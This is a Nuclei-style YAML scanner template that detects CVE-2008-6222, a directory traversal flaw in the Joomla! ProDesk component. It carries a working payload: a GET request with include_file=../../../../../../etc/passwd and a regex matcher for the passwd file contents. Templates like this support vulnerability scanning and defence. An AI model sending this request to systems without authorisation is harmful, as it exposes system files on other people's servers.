39 lines
1.1 KiB
YAML
39 lines
1.1 KiB
YAML
id: CVE-2008-6222
|
|
|
|
info:
|
|
name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/6980
|
|
- http://web.archive.org/web/20111223225601/http://secunia.com/advisories/32523/
|
|
- http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2008-6222
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
cvss-score: 8.6
|
|
cve-id: CVE-2008-6222
|
|
cwe-id: CWE-22
|
|
tags: cve2008,joomla,lfi,edb,cve
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/07/06
|